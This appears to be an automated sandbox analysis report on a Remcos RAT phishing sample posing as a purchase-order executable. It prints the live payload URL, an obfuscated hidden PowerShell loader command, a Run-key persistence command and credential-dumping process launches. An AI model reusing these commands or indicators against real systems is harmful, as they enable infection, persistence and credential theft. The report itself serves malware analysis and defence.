              Source: wab.exe, 00000007.00000002.2954637411.00000000255E0000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: wab.exeString found in binary or memory: http://www.nirsoft.net/
              Source: powershell.exe, 00000001.00000002.2394581791.0000000005061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000001.00000002.2398641470.00000000060CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000001.00000002.2398641470.00000000060CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000001.00000002.2398641470.00000000060CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000001.00000002.2394581791.00000000051B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, 00000001.00000002.2398641470.00000000060CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: wab.exe, 00000007.00000002.2939812066.00000000096F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ricohltd.top/
              Source: wab.exe, 00000007.00000002.2939812066.00000000096F8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939812066.00000000096BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ricohltd.top/PIoDroeALMbPB243.bin
              Source: wab.exe, 00000007.00000002.2939812066.00000000096BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ricohltd.top/PIoDroeALMbPB243.binB
              Source: wab.exe, 00000007.00000002.2939812066.00000000096BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ricohltd.top/PIoDroeALMbPB243.binn
              Source: wab.exeString found in binary or memory: https://www.google.com
              Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownHTTPS traffic detected: 104.21.60.38:443 -> 192.168.2.4:49737 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeCode function: 0_2_004052EE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,12_2_0040987A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_004098E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_00406DFC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,13_2_00406E9F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_004068B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,14_2_004072B5

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000003.2417745703.000000000971E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2443472067.000000000971E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2939981416.000000000971F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2417578332.000000000971A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7812, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED

              System Summary

              barindex
              Powershell drops PE file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\z14Novospedidosdecompra_Profil_4903.exeJump to dropped file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00401806 NtdllDefWindowProc_W,12_2_00401806
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004018C0 NtdllDefWindowProc_W,12_2_004018C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004016FD NtdllDefWindowProc_A,13_2_004016FD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004017B7 NtdllDefWindowProc_A,13_2_004017B7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00402CAC NtdllDefWindowProc_A,14_2_00402CAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00402D66 NtdllDefWindowProc_A,14_2_00402D66
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeFile created: C:\Windows\resources\0809Jump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeCode function: 0_2_004070400_2_00407040
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeCode function: 0_2_004068690_2_00406869
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeCode function: 0_2_00404B2B0_2_00404B2B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04F4EFF81_2_04F4EFF8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04F4F8C81_2_04F4F8C8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04F4ECB01_2_04F4ECB0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044B04012_2_0044B040
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0043610D12_2_0043610D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044731012_2_00447310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044A49012_2_0044A490
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040755A12_2_0040755A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0043C56012_2_0043C560
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044B61012_2_0044B610
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044D6C012_2_0044D6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004476F012_2_004476F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044B87012_2_0044B870
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044081D12_2_0044081D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0041495712_2_00414957
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004079EE12_2_004079EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00407AEB12_2_00407AEB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044AA8012_2_0044AA80
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00412AA912_2_00412AA9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00404B7412_2_00404B74
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00404B0312_2_00404B03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044BBD812_2_0044BBD8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00404BE512_2_00404BE5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00404C7612_2_00404C76
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00415CFE12_2_00415CFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00416D7212_2_00416D72
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00446D3012_2_00446D30
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00446D8B12_2_00446D8B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00406E8F12_2_00406E8F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040503813_2_00405038
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0041208C13_2_0041208C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004050A913_2_004050A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040511A13_2_0040511A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0043C13A13_2_0043C13A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004051AB13_2_004051AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044930013_2_00449300
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040D32213_2_0040D322
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044A4F013_2_0044A4F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0043A5AB13_2_0043A5AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0041363113_2_00413631
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044669013_2_00446690
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044A73013_2_0044A730
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004398D813_2_004398D8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004498E013_2_004498E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044A88613_2_0044A886
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0043DA0913_2_0043DA09
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00438D5E13_2_00438D5E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00449ED013_2_00449ED0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0041FE8313_2_0041FE83
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00430F5413_2_00430F54
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004050C214_2_004050C2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004014AB14_2_004014AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040513314_2_00405133
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004051A414_2_004051A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040124614_2_00401246
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040CA4614_2_0040CA46
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040523514_2_00405235
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004032C814_2_004032C8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040168914_2_00401689
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00402F6014_2_00402F60
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
              Source: z14Novospedidosdecompra_Profil_4903.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: z14Novospedidosdecompra_Profil_4903.exe.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: z14Novospedidosdecompra_Profil_4903.exe, 00000000.00000000.1666816620.0000000000454000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamestade.exeDVarFileInfo$ vs z14Novospedidosdecompra_Profil_4903.exe
              Source: z14Novospedidosdecompra_Profil_4903.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)"
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@21/15@3/3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,12_2_004182CE
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,14_2_00410DE1
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeCode function: 0_2_004045AF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045AF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,FindCloseChangeNotification,12_2_00413D4C
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,12_2_0040B58D
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeFile created: C:\Users\user\AppData\Roaming\skabioseJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\alpwovnb-G3F5OR
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeFile created: C:\Users\user\AppData\Local\Temp\nsm3F58.tmpJump to behavior
              Source: z14Novospedidosdecompra_Profil_4903.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: wab.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 00000007.00000002.2955047654.0000000025DC0000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: z14Novospedidosdecompra_Profil_4903.exeReversingLabs: Detection: 57%
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeFile read: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_13-32948
              Source: unknownProcess created: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe"
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursusplans.Fje';$Oxyphosphate=$Bromslvs.SubString(61080,3);.$Oxyphosphate($Bromslvs)"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wjdznalymjqnxoyrjyc"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wjdznalymjqnxoyrjyc"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hdqrgswaarisauuvaipksos"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jfwcglgtwzafkaizktcddtnovi"
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursusplans.Fje';$Oxyphosphate=$Bromslvs.SubString(61080,3);.$Oxyphosphate($Bromslvs)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wjdznalymjqnxoyrjyc"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wjdznalymjqnxoyrjyc"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hdqrgswaarisauuvaipksos"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jfwcglgtwzafkaizktcddtnovi"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)"Jump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: wintypes.dllJump to behavior
